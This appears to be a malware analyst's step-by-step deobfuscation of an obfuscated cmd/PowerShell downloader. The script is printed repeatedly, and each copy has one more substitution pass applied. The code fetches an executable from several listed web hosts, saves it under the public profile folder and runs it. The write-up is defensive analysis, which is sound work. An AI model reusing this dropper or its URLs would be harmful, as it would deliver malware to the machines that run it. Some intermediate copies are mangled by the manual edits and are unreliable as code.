set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(3Gj & ( ([sTriNG]mQever'+'BosePr'+'EFErence)[1,3]+s3Gj+3GjDBxsDB-JoiNsDBsDB)3Gj+3Gj 

(
(
sDBaEsD'+'B+sDB1fsDB+sDBrasDB+sDBnc 3Gj+3Gj= sDB+sDBnewsDB'+'+sDB-sDB+sDBosD'+'B+3Gj+3GjsDBbje3Gj+3GjcsDB+sDBtsDB+sDB SystesDB+sDBm.NesDB+sDB'+'3Gj+3GjtsDB+sDB.sDB+sDBWesDB+sDBbCliesDB+sDBnts'+'DB+'+'sDB;sDB+sDBaE1nsDB+sDBsadasdsDB+sDB =s'+'DB+sD3Gj+3GjB sDB+sDBnewsD'+'B+sDB-objesDB+sDBct rsDB+sDBasDB+sDBndsDB+sDBosDB+sDBm'+';aE1bsDB+sDBcsDB+sDBd =sDB+sDB DsphsDB+sDBtsDB+sDBtp://sDB+sDBwwsDB+sD3Gj+3GjBw.sDB+sDBmesD3Gj+3GjB+sDBdi3Gj+3Gjcis'+'DB+sDBns3Gj+3GjDB+sDBes'+'DB+sDBdists'+'DB+sDBributor.com/sDB+sDBUVR3Gj+3GjJ/,h3Gj+3GjttpsD'+'B+sDB:/sDB+sDB/sDB+sDBwww.shopnz.in/fg/,sDB+sDBhtsDB+s3Gj+3GjDBtpsDB+sDB://csDB+sDBa'+'bsDB+sDBletvinternet'+'.usDB+sDBs/fFsDB+sDBQiRYu/,httsDB'+'+sDBp://www3Gj'+'+3Gj.sDB+sDBdongho'+'dinsDB+sDBhvi3Gj+3GjsDB+sDBgps.cosDB+sDBm/h/,sDB+sDBhttp://aj'+'asDB+sDBx3Gj+3GjtusDB+sDBbe.sDB+sDBco3Gj+3GjsDB+sD3G'+'j+3GjBm/tFsDB+sDBUIADPsDB+sDB/DsDB+sDBsp.Split(DssDB'+'+sDBpsDB+sDB,sDB+sDBDsDB+sDBsp)sDB+s'+'DB;aE1karasDB+sDBpasDB+sDBssDB+sD'+'B = sDB+sDBaEsDB+sDB1nssDB+sDBadasd.nsDB+sDBext(sDB+sDB1, 343245);aEsDB+sDB1huas = aE1esDB+sD'+'BnsDB+sDBv:sDB+sDB'+'pubsDB+sDBlsDB+sDBic sDB+sDB3Gj+3Gj+sDB+sDB DspsDB+sDB7H5'+'3Gj+3Gj'+'Dsp + aE1karapsDB+sDBas + s3Gj+3GjDB+sDBDsDB+sDBssDB+sDBp.exeDsp;sDB+sDBfosDB+sDBreachsDB+sDB(aE'+'1sDB+sDBasDB+sDBbc in aE1sDB+sDBbcds'+'DB+sDB){tr3Gj+3GjysDB+sDB{aE'+'1frsDB+sDBasD'+'B+sDBnsDB+sDBc.sDB+sDBDownlsDB+sDB3Gj+'+'3GjoadFisDB+sDBlsDB+sDBe(aEsDB+sDB1asDB+sDBb'+'c.TsDB+sDBoStsDB+sD'+'BrisDB+sDBng(), aE1'+'huasDB+sDB'+'s);InsDB+3Gj+3'+'GjsDBvoke-ItsDB+sDB'+'em('+'asDB+sDBE1sDB+sDB'+'hsDB+sDBua'+'s)sDB+sDB;breasDB'+'+sDBk3Gj+3Gj;}catsDB+sDBch{wsDB+'+'sDBr3Gj+3GjisDB+sDBte-host aE1_.ExsDB+sDBceptionsDB+s'+'DB.sDB+sDBMessagesDB'+'+sDB;}}sDB
)
.REpLacE(sDBDspsDB,['+'s'+'trI'+'ng][cH3Gj+3GjAr]39).REpLacE(([c3Gj+3GjHAr]55+[cHAr]72+[cHAr]53Gj+3Gj3),sDBzT2sDB'+').REpLacE(sDBaE1sDB,3Gj+3GjsDBmQes3Gj+3G'+'jDB) '+'
)
3Gj
)
-cREpLaCe3GjmQe3Gj,'+'[CHar'+']36 -REplAce  3Gj'+'zT23Gj,[CHar]92 -REplAce 3GjsDB3Gj,[CHar]39
)
PBw .( tiQSHEllId[1]'+'+tiQshElL'+'id[13]+3Gjx3Gj)')  -cREplACe  ([cHaR]116+[cHaR]105+[cHaR]81),[cHaR]36-REPLacE'3Gj',[cHaR]39-REPLacE([cHaR]80+[cHaR]66+[cHaR]119),[cHaR]124
)
)

As seen above, there is some more cleaning up to do to get rid of the extra obfuscation. What I did to get through this was to start at the last line and worked through that to get the CHAR values and the replacement values. Once that was done, I would take that information and apply it to the rest of the code. I did this over several iterations to get the script deobfuscated and more readable. The following steps is how I worked through the script to get to the final, cleaned up version.

*** Cleaned up last line of code and converting CHAR to string ***
*** Manually Removed + signs ***
*** Removed all instances of tiQ with $ character ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(3Gj & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s3Gj3GjDBxsDB-JoiNsDBsDB)3Gj3Gj 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc 3Gj3Gj= sDBsDBnewsDB''sDB-sDBsDBosD''B3Gj3GjsDBbje3Gj3GjcsDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''3Gj3GjtsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD3Gj3GjB sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD3Gj3GjBw.sDBsDBmesD3Gj3GjBsDBdi3Gj3Gjcis''DBsDBns3Gj3GjDBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR3Gj3GjJ/,h3Gj3GjttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs3Gj3GjDBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www3Gj''3Gj.sDBsDBdongho''dinsDBsDBhvi3Gj3GjsDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx3Gj3GjtusDBsDBbe.sDBsDBco3Gj3GjsDBsD3G''j3GjBm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB3Gj3GjsDBsDB DspsDBsDB7H5''3Gj3Gj''Dsp  aE1karapsDBsDBas  s3Gj3GjDBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr3Gj3GjysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB3Gj''3GjoadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB3Gj3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk3Gj3Gj;}catsDBsDBch{wsDB''sDBr3Gj3GjisDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH3Gj3GjAr]39).REpLacE(([c3Gj3GjHAr]55[cHAr]72[cHAr]53Gj3Gj3),sDB\sDB'').REpLacE(sDBaE1sDB,3Gj3GjsDBmQes3Gj3G''jDB) ''
)
3Gj
)
-cREpLaCe3GjmQe3Gj,''[CHar'']36 -REplAce  3Gj''\3Gj,[CHar]92 -REplAce 3GjsDB3Gj,[CHar]39
)
PBw .( $SHEllId[1]''$shElL''id[13]3Gjx3Gj)')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all 3Gj instances with ‘ (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDBmQes'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''[CHar'']36 -REplAce  '''\',[CHar]92 -REplAce 'sDB',[CHar]39
)
PBw .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of PBw with | (pipe character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]mQever''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDBmQes'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''[CHar'']36 -REplAce  '''\',[CHar]92 -REplAce 'sDB',[CHar]39
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Cleaned up 2nd to last line of code and converted CHAR to string ***
*** Removed all instances of mQe with $ character ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDB$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of mQe with \ (backslash character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBxsDB-JoiNsDBsDB)'' 

(
(
sDBaEsD''BsDB1fsDBsDBrasDBsDBnc ''= sDBsDBnewsDB''sDB-sDBsDBosD''B''sDBbje''csDBsDBtsDBsDB SystesDBsDBm.NesDBsDB''''tsDBsDB.sDBsDBWesDBsDBbCliesDBsDBnts''DB''sDB;sDBsDBaE1nsDBsDBsadasdsDBsDB =s''DBsD''B sDBsDBnewsD''BsDB-objesDBsDBct rsDBsDBasDBsDBndsDBsDBosDBsDBm'';aE1bsDBsDBcsDBsDBd =sDBsDB DsphsDBsDBtsDBsDBtp://sDBsDBwwsDBsD''Bw.sDBsDBmesD''BsDBdi''cis''DBsDBns''DBsDBes''DBsDBdists''DBsDBributor.com/sDBsDBUVR''J/,h''ttpsD''BsDB:/sDBsDB/sDBsDBwww.shopnz.in/fg/,sDBsDBhtsDBs''DBtpsDBsDB://csDBsDBa''bsDBsDBletvinternet''.usDBsDBs/fFsDBsDBQiRYu/,httsDB''sDBp://www''''.sDBsDBdongho''dinsDBsDBhvi''sDBsDBgps.cosDBsDBm/h/,sDBsDBhttp://aj''asDBsDBx''tusDBsDBbe.sDBsDBco''sDBsD3G''j'Bm/tFsDBsDBUIADPsDBsDB/DsDBsDBsp.Split(DssDB''sDBpsDBsDB,sDBsDBDsDBsDBsp)sDBs''DB;aE1karasDBsDBpasDBsDBssDBsD''B = sDBsDBaEsDBsDB1nssDBsDBadasd.nsDBsDBext(sDBsDB1, 343245);aEsDBsDB1huas = aE1esDBsD''BnsDBsDBv:sDBsDB''pubsDBsDBlsDBsDBic sDBsDB''sDBsDB DspsDBsDB7H5''''''Dsp  aE1karapsDBsDBas  s''DBsDBDsDBsDBssDBsDBp.exeDsp;sDBsDBfosDBsDBreachsDBsDB(aE''1sDBsDBasDBsDBbc in aE1sDBsDBbcds''DBsDB){tr''ysDBsDB{aE''1frsDBsDBasD''BsDBnsDBsDBc.sDBsDBDownlsDBsDB''''oadFisDBsDBlsDBsDBe(aEsDBsDB1asDBsDBb''c.TsDBsDBoStsDBsD''BrisDBsDBng(), aE1''huasDBsDB''s);InsDB'3''GjsDBvoke-ItsDBsDB''em(''asDBsDBE1sDBsDB''hsDBsDBua''s)sDBsDB;breasDB''sDBk'';}catsDBsDBch{wsDB''sDBr''isDBsDBte-host aE1_.ExsDBsDBceptionsDBs''DB.sDBsDBMessagesDB''sDB;}}sDB
)
.REpLacE(sDBDspsDB,[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),sDB\sDB'').REpLacE(sDBaE1sDB,''sDB$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of sDB with ‘ (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' Dsph''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' Dsp''7H5''''''Dsp  aE1karap''as  s''DB'D''s''p.exeDsp;''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of Dsp with ‘ (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' 'h''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' '''7H5'''''''  aE1karap''as  s''DB'D''s''p.exe';''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng]').REpLacE((7H5),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Removed all instances of 7H5” with \ (backslash character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' 'h''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' '''\'''''  aE1karap''as  s''DB'D''s''p.exe';''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), 